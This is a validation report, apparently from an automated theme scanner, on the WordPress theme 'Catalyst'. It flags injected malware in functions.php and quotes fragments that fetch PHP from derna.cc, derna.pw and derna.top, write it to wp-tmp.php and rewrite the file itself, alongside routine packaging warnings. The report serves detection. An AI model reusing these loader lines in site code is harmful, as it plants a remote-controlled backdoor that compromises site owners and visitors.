15
Validation results

Catalyst

Catalyst

WordPress 5.0.3 theme
15
Critical alerts
  1. Malware : Operations on file system file_get_contents was found in the file functions.php
    Line 19: if ($file = @file_get_contents(__FILE__))
    Line 21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    Line 41: if ($file = @file_get_contents(__FILE__))
    Line 76: function file_get_contents_tcurl($url)
    Line 102: if (($tmpcontent = @file_get_contents('http://www.derna.cc/code.php') OR $tmpcontent = @file_ge
    Line 119: elseif ($tmpcontent = @file_get_contents('http://www.derna.pw/code.php')  AND stripos($tmpcontent,
    Line 133: } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte
    Line 136: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm
    Line 139: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== 
    Line 142: } elseif (($tmpcontent = @file_get_contents('http://www.derna.top/code.php') OR $tmpcontent = @file_g
    file_put_contents was found in the file functions.php
    Line 25: @file_put_contents(__FILE__, $file);
    Line 47: @file_put_contents(__FILE__, $file);
    Line 106: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 109: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 111: @file_put_contents('wp-tmp.php', $tmpcontent);
    Line 123: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 126: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 128: @file_put_contents('wp-tmp.php', $tmpcontent);
    file_get_contents was found in the file functions.php
    Line 19: if ($file = @file_get_contents(__FILE__))
    Line 21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    Line 41: if ($file = @file_get_contents(__FILE__))
    Line 76: function file_get_contents_tcurl($url)
    Line 102: if (($tmpcontent = @file_get_contents('http://www.derna.cc/code.php') OR $tmpcontent = @file_ge
    Line 119: elseif ($tmpcontent = @file_get_contents('http://www.derna.pw/code.php')  AND stripos($tmpcontent,
    Line 133: } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte
    Line 136: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm
    Line 139: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== 
    Line 142: } elseif (($tmpcontent = @file_get_contents('http://www.derna.top/code.php') OR $tmpcontent = @file_g
    file_put_contents was found in the file functions.php
    Line 25: @file_put_contents(__FILE__, $file);
    Line 47: @file_put_contents(__FILE__, $file);
    Line 106: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 109: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 111: @file_put_contents('wp-tmp.php', $tmpcontent);
    Line 123: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 126: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 128: @file_put_contents('wp-tmp.php', $tmpcontent);
    fopen was found in the file functions.php
    Line 92: $handle   = fopen($tmpfname, 'w+');
    fwrite was found in the file functions.php
    Line 93: fwrite($handle, '<?php\n' . $phpCode);
    fclose was found in the file functions.php
    Line 94: fclose($handle);
    file_get_contents was found in the file functions.php
    Line 19: if ($file = @file_get_contents(__FILE__))
    Line 21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    Line 41: if ($file = @file_get_contents(__FILE__))
    Line 76: function file_get_contents_tcurl($url)
    Line 102: if (($tmpcontent = @file_get_contents('http://www.derna.cc/code.php') OR $tmpcontent = @file_ge
    Line 119: elseif ($tmpcontent = @file_get_contents('http://www.derna.pw/code.php')  AND stripos($tmpcontent,
    Line 133: } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte
    Line 136: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm
    Line 139: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== 
    Line 142: } elseif (($tmpcontent = @file_get_contents('http://www.derna.top/code.php') OR $tmpcontent = @file_g
    file_put_contents was found in the file functions.php
    Line 25: @file_put_contents(__FILE__, $file);
    Line 47: @file_put_contents(__FILE__, $file);
    Line 106: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 109: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 111: @file_put_contents('wp-tmp.php', $tmpcontent);
    Line 123: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 126: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 128: @file_put_contents('wp-tmp.php', $tmpcontent);
    file_put_contents was found in the file functions.php
    Line 25: @file_put_contents(__FILE__, $file);
    Line 47: @file_put_contents(__FILE__, $file);
    Line 106: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 109: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 111: @file_put_contents('wp-tmp.php', $tmpcontent);
    Line 123: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 126: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 128: @file_put_contents('wp-tmp.php', $tmpcontent);
    file_put_contents was found in the file functions.php
    Line 25: @file_put_contents(__FILE__, $file);
    Line 47: @file_put_contents(__FILE__, $file);
    Line 106: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 109: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 111: @file_put_contents('wp-tmp.php', $tmpcontent);
    Line 123: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 126: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 128: @file_put_contents('wp-tmp.php', $tmpcontent);
    file_get_contents was found in the file functions.php
    Line 19: if ($file = @file_get_contents(__FILE__))
    Line 21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    Line 41: if ($file = @file_get_contents(__FILE__))
    Line 76: function file_get_contents_tcurl($url)
    Line 102: if (($tmpcontent = @file_get_contents('http://www.derna.cc/code.php') OR $tmpcontent = @file_ge
    Line 119: elseif ($tmpcontent = @file_get_contents('http://www.derna.pw/code.php')  AND stripos($tmpcontent,
    Line 133: } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte
    Line 136: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm
    Line 139: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== 
    Line 142: } elseif (($tmpcontent = @file_get_contents('http://www.derna.top/code.php') OR $tmpcontent = @file_g
    file_put_contents was found in the file functions.php
    Line 25: @file_put_contents(__FILE__, $file);
    Line 47: @file_put_contents(__FILE__, $file);
    Line 106: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 109: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 111: @file_put_contents('wp-tmp.php', $tmpcontent);
    Line 123: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 126: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 128: @file_put_contents('wp-tmp.php', $tmpcontent);
    file_put_contents was found in the file functions.php
    Line 25: @file_put_contents(__FILE__, $file);
    Line 47: @file_put_contents(__FILE__, $file);
    Line 106: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 109: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 111: @file_put_contents('wp-tmp.php', $tmpcontent);
    Line 123: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 126: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 128: @file_put_contents('wp-tmp.php', $tmpcontent);
    file_put_contents was found in the file functions.php
    Line 25: @file_put_contents(__FILE__, $file);
    Line 47: @file_put_contents(__FILE__, $file);
    Line 106: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 109: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 111: @file_put_contents('wp-tmp.php', $tmpcontent);
    Line 123: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    Line 126: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    Line 128: @file_put_contents('wp-tmp.php', $tmpcontent);
    file_get_contents was found in the file functions.php
    Line 19: if ($file = @file_get_contents(__FILE__))
    Line 21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    Line 41: if ($file = @file_get_contents(__FILE__))
    Line 76: function file_get_contents_tcurl($url)
    Line 102: if (($tmpcontent = @file_get_contents('http://www.derna.cc/code.php') OR $tmpcontent = @file_ge
    Line 119: elseif ($tmpcontent = @file_get_contents('http://www.derna.pw/code.php')  AND stripos($tmpcontent,
    Line 133: } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte
    Line 136: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm
    Line 139: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== 
    Line 142: } elseif (($tmpcontent = @file_get_contents('http://www.derna.top/code.php') OR $tmpcontent = @file_g
    file_get_contents was found in the file functions.php
    Line 19: if ($file = @file_get_contents(__FILE__))
    Line 21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    Line 41: if ($file = @file_get_contents(__FILE__))
    Line 76: function file_get_contents_tcurl($url)
    Line 102: if (($tmpcontent = @file_get_contents('http://www.derna.cc/code.php') OR $tmpcontent = @file_ge
    Line 119: elseif ($tmpcontent = @file_get_contents('http://www.derna.pw/code.php')  AND stripos($tmpcontent,
    Line 133: } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte
    Line 136: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm
    Line 139: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== 
    Line 142: } elseif (($tmpcontent = @file_get_contents('http://www.derna.top/code.php') OR $tmpcontent = @file_g
    file_get_contents was found in the file functions.php
    Line 19: if ($file = @file_get_contents(__FILE__))
    Line 21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    Line 41: if ($file = @file_get_contents(__FILE__))
    Line 76: function file_get_contents_tcurl($url)
    Line 102: if (($tmpcontent = @file_get_contents('http://www.derna.cc/code.php') OR $tmpcontent = @file_ge
    Line 119: elseif ($tmpcontent = @file_get_contents('http://www.derna.pw/code.php')  AND stripos($tmpcontent,
    Line 133: } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte
    Line 136: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm
    Line 139: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== 
    Line 142: } elseif (($tmpcontent = @file_get_contents('http://www.derna.top/code.php') OR $tmpcontent = @file_g
    file_get_contents was found in the file functions.php
    Line 19: if ($file = @file_get_contents(__FILE__))
    Line 21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    Line 41: if ($file = @file_get_contents(__FILE__))
    Line 76: function file_get_contents_tcurl($url)
    Line 102: if (($tmpcontent = @file_get_contents('http://www.derna.cc/code.php') OR $tmpcontent = @file_ge
    Line 119: elseif ($tmpcontent = @file_get_contents('http://www.derna.pw/code.php')  AND stripos($tmpcontent,
    Line 133: } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte
    Line 136: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm
    Line 139: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== 
    Line 142: } elseif (($tmpcontent = @file_get_contents('http://www.derna.top/code.php') OR $tmpcontent = @file_g
  2. Malware : Network operations curl_init was found in the file functions.php
    Line 78: $ch = curl_init();
    curl_exec was found in the file functions.php
    Line 84: $data = curl_exec($ch);
  3. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-tgm-plugin-activation.php :
    Line 641: $this->page_hook = call_user_func( 'add_submenu_page', $args['parent_slug'], $args['page_title'], $args['menu_t
  4. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was themefyre-builder.zip themefyre-portfolio.zip.
Warning
  1. special URIs : Presence of bad theme tagsTheme URI and Author URI should not be the same.
  2. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are catalyst, tgmpa.
  4. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  5. Screenshot : Screenshot fileScreenshot dimensions are wrong! Detected: 590x300px (59:30). Ratio of width to height should be 4:3.Screenshot size is 590x300px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file header.php.
    Line 40: <?php if ( has_nav_menu( 'top-bar-social' ) ) : ?><a href='http://www.helpinghand.co.uk'><img src='/wp-content/uploads/2017/11/hhclogo
    Possible hard-coded links were found in the file functions.php.
    Line 540: printf( esc_html__( ' - %1$s Theme by %2$s', 'catalyst' ), 'Catalyst', '<a href='http://themefyre.com/'>Themefyre</a>' );
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of archive template file archive.phpThis theme does not contain optional file archive.php.
  11. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  12. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.

This is a ThemeForest theme. Since Themeforest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score ( Themeforest requirements ).

56
Critical alerts
  1. Malware : Network operations curl_init was found in the file functions.php
    Line 78: $ch = curl_init();
    curl_exec was found in the file functions.php
    Line 84: $data = curl_exec($ch);
  2. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was themefyre-builder.zip themefyre-portfolio.zip.
Warning
  1. special URIs : Presence of bad theme tagsTheme URI and Author URI should not be the same.
  2. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are catalyst, tgmpa.
  4. Screenshot : Screenshot fileScreenshot dimensions are wrong! Detected: 590x300px (59:30). Ratio of width to height should be 4:3.Screenshot size is 590x300px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file header.php.
    Line 40: <?php if ( has_nav_menu( 'top-bar-social' ) ) : ?><a href='http://www.helpinghand.co.uk'><img src='/wp-content/uploads/2017/11/hhclogo
    Possible hard-coded links were found in the file functions.php.
    Line 540: printf( esc_html__( ' - %1$s Theme by %2$s', 'catalyst' ), 'Catalyst', '<a href='http://themefyre.com/'>Themefyre</a>' );
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of archive template file archive.phpThis theme does not contain optional file archive.php.
  11. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  12. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
Other checked themes